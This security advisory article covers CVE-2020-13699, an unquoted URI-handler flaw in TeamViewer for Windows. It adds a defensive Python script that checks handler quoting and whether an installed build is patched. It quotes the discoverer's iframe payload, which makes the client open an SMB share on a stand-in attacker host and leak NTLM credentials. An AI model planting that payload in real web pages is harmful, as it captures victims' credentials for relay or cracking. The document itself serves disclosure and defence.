A high-risk vulnerability was found in TeamViewer for Windows. It is tracked as CVE-2020-13699, with a CVSS base score of 8.8, and could be exploited by remote attackers to crack users' passwords and, from there, to compromise the system further.
TeamViewer is a software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers developed by the German company TeamViewer GmbH. TeamViewer is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
Use of remote-connectivity applications has increased recently because of the shift to working from home during the COVID-19 pandemic.
CVE-2020-13699 Vulnerability Details:
- CVE-2020-13699 is a security flaw that stems from an unquoted search path or element. Specifically, the application does not correctly quote its custom URI handlers.
- To exploit it, an attacker tricks a user who has a vulnerable TeamViewer version installed into visiting a maliciously crafted website.
- According to Jeffrey Hofmann, a security engineer with Praetorian, who discovered and disclosed the vulnerability: “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.”
- Windows performs NTLM authentication when opening the SMB share. That request can be relayed, i.e., an attacker can capture the authentication and forward it to another server, gaining the ability to perform operations on that server with the authenticated user's privileges.
- Successful exploitation could allow a remote attacker to launch TeamViewer with arbitrary parameters. The application could be forced to send an NTLM authentication request to the attacker's system, enabling offline rainbow-table attacks and brute-force cracking attempts against the captured hash.
- Credentials stolen this way could then be used for further exploitation.
The disclosure states that there is no evidence that this vulnerability has been exploited.
According to CIS, the risk of exploitation is high for government institutions and mid-size companies, medium for small businesses, and low for home users.
Exploiting the vulnerability could allow remote attackers to obtain sensitive credential information or take full control of the affected system.
Affected Versions:
TeamViewer Windows Desktop Application prior to 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
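As an added example (it is not from the advisory, from TeamViewer or from Praetorian), the following Python script shows the two checks a defender would want from the vulnerability details and the affected-version list above: whether a custom URI handler's command string leaves its URL placeholder unquoted, so that whitespace inside a URI turns into extra arguments for the launched program, and whether an installed build is at or above the fixed release for its branch. The handler command strings are constructed stand-ins, not TeamViewer's actual registry values; the URI is the one quoted in the disclosure; and the tokenizer is a simplified model of Windows command-line splitting.

```python
"""Checks for the two conditions the advisory describes: an installed build
older than the fixed release for its branch, and a custom URI handler whose
URL placeholder (%1) is not quoted. Added example, not vendor code."""

# Fixed builds from the advisory's affected-version list. An install older
# than the entry for its branch is affected. Keys are the version prefix the
# entry applies to (14.x is split into two branches on the page).
FIXED_BUILDS = {
    "8": "8.0.258861",
    "9": "9.0.258860",
    "10": "10.0.258873",
    "11": "11.0.258870",
    "12": "12.0.258869",
    "13": "13.2.36220",
    "14.2": "14.2.56676",
    "14.7": "14.7.48350",
    "15": "15.8.3",
}


def parse_version(version):
    """'15.8.3' -> (15, 8, 3), so tuples compare numerically."""
    return tuple(int(p) for p in version.split("."))


def branch_of(version):
    """Pick the most specific FIXED_BUILDS key (major.minor, then major)."""
    parts = version.split(".")
    for key in (".".join(parts[:2]), parts[0]):
        if key in FIXED_BUILDS:
            return key
    return None


def is_fixed_build(version):
    """True if at or above the fixed build for its branch, False if older,
    None if the branch is not listed on the page (e.g. 14.3.x)."""
    branch = branch_of(version)
    if branch is None:
        return None
    return parse_version(version) >= parse_version(FIXED_BUILDS[branch])


def split_command(cmd):
    """Simplified Windows-style argument splitting: whitespace separates
    arguments unless inside double quotes. Returns (argument, was_quoted)."""
    args, buf, quoted, in_quote = [], [], False, False
    for ch in cmd:
        if ch == '"':
            in_quote = not in_quote
            quoted = True
        elif ch.isspace() and not in_quote:
            if buf or quoted:
                args.append(("".join(buf), quoted))
            buf, quoted = [], False
        else:
            buf.append(ch)
    if buf or quoted:
        args.append(("".join(buf), quoted))
    return args


def unquoted_url_arguments(cmd):
    """Placeholder arguments (%1 and friends) that sit outside quotes.
    This is the weakness class the advisory describes: an unquoted
    placeholder lets a URI containing spaces inject extra arguments."""
    return [a for a, q in split_command(cmd) if "%" in a and not q]


def expand_handler(cmd, uri):
    """Substitute the URI for %1 the way the shell would and re-split, to
    show what argument list the handler executable actually receives."""
    return [a for a, _ in split_command(cmd.replace("%1", uri))]


# Constructed handler commands (stand-ins, not TeamViewer's registry values).
HANDLER_UNQUOTED = r'"C:\Program Files\TeamViewer\TeamViewer.exe" %1'
HANDLER_QUOTED = r'"C:\Program Files\TeamViewer\TeamViewer.exe" "%1"'
# The URI quoted in the Praetorian disclosure on the page.
ADVISORY_URI = r"teamviewer10: --play \\attacker-IP\share\fake.tvs"

if __name__ == "__main__":
    for label, cmd in (("unquoted", HANDLER_UNQUOTED), ("quoted", HANDLER_QUOTED)):
        print(label, "handler -> placeholders outside quotes:",
              unquoted_url_arguments(cmd))
        print("  argv seen by the handler:", expand_handler(cmd, ADVISORY_URI))
    for v in ("15.7.6", "15.8.3", "14.2.56675", "14.7.48350", "14.3.1"):
        print(v, "fixed:", is_fixed_build(v))
```

With the unquoted handler the advisory's URI arrives as four separate arguments (the scheme, `--play`, and the UNC path), which is exactly what lets a web page pick the client's command-line options; with the placeholder quoted the whole URI stays one argument. On a real host the command string to feed into `unquoted_url_arguments` lives under `HKEY_CLASSES_ROOT\<scheme>\shell\open\command` for each registered scheme and would be read with `winreg`; that part is left out so the example runs offline.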
TeamViewer has published a security update addressing CVE-2020-13699; updating to the fixed builds listed above resolves the issue.